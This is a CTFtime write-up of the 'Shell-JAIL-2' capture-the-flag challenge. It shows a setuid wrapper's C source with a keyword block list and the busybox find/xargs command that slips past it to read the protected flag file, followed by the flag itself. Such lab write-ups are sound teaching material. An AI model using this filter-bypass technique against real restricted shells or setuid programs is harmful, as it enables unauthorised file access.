CTFtime.org

Shell-JAIL-2

by kazkiti / PwnaSonic

Tags: shell 

Rating:

# ▼▼▼Shell-JAIL-2(PWN:250) 136/605=22.5%▼▼▼

```
Download the login private key, then run:
ssh -p 31337 -i login [email protected]
redundant servers on 31338 and 31339
made by Ben Chaney

file :ssh key `login`

```

$ **chmod 600 login**

$ **ssh -p 31337 -i login [email protected]**

ssh login

---

54cd9d6b47ef:/home/pc_owner$ **ls -l**

```
total 20
-r-sr-sr-x 1 pc_owner pc_owner 10912 Apr 13 08:03 access
-r--r--r-- 1 pc_owner pc_owner 1030 Apr 13 05:39 access.c
-r--r----- 1 pc_owner pc_owner 28 Apr 13 05:39 flag.txt
```

---

54cd9d6b47ef:/home/pc_owner$ **cat flag.txt**

```
cat: can't open 'flag.txt': Permission denied
```

---

54cd9d6b47ef:/home/pc_owner$ **cat access.c**

```
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <string.h>

char *gen_cmd(int argc, const char **argv){
size_t total_size = 1;
for(int it = 1; it < argc; it++){
total_size+= strlen(argv[it]);
}
char *ret = malloc(total_size);
total_size = 0;
for(int it = 1; it < argc; it++){
size_t len = strlen(argv[it]);
memcpy(ret+total_size, argv[it], len);
total_size+= len;
ret[total_size] = ' ';
total_size++;
}
ret[total_size] = '\0';
return ret;
}

int filter(const char *cmd){
int valid = 1;
valid &= strstr(cmd, "*") == NULL;
valid &= strstr(cmd, "sh") == NULL;
valid &= strstr(cmd, "/") == NULL;
valid &= strstr(cmd, "home") == NULL;
valid &= strstr(cmd, "pc_owner") == NULL;
valid &= strstr(cmd, "flag") == NULL;
valid &= strstr(cmd, "txt") == NULL;
return valid;
}

int main(int argc, const char **argv){
setreuid(UID, UID);
char *cmd = gen_cmd(argc, argv);
if (!filter(cmd)){
exit(-1);
}
setenv("PATH", "", 1);
system(cmd);
}
```

```
・You can execute commands through access
・There are unusable characters "*", "sh", "/", "home","pc_owner","flag","txt" by the filter
・Environment variable PATH is invalidated
```

---

54cd9d6b47ef:/bin$ **cd /bin**

54cd9d6b47ef:/bin$ **ls**

```
ash dumpkmap ipcalc mpstat setpriv
base64 echo kbd_mode mv setserial
bash ed kill netstat sh
bashbug egrep link nice sleep
bbconfig false linux32 pidof stat
busybox fatattr linux64 ping stty
cat fdflush ln ping6 su
chgrp fgrep login pipe_progress sync
chmod fsync ls printenv tar
chown getopt lzop ps touch
conspy grep makemime pwd true
cp groups mkdir reformime umount
date gunzip mknod rev uname
dd gzip mktemp rm usleep
df hostname more rmdir watch
dmesg ionice mount run-parts zcat
dnsdomainname iostat mountpoint sed
54cd9d6b47ef:/bin$
```

---

54cd9d6b47ef:/bin$ **/home/pc_owner/access 'busybox find .. -size 28c|busybox xargs cat'**

`wpi{p0s1x_sh3Lls_ar3_w13rD}`

Comments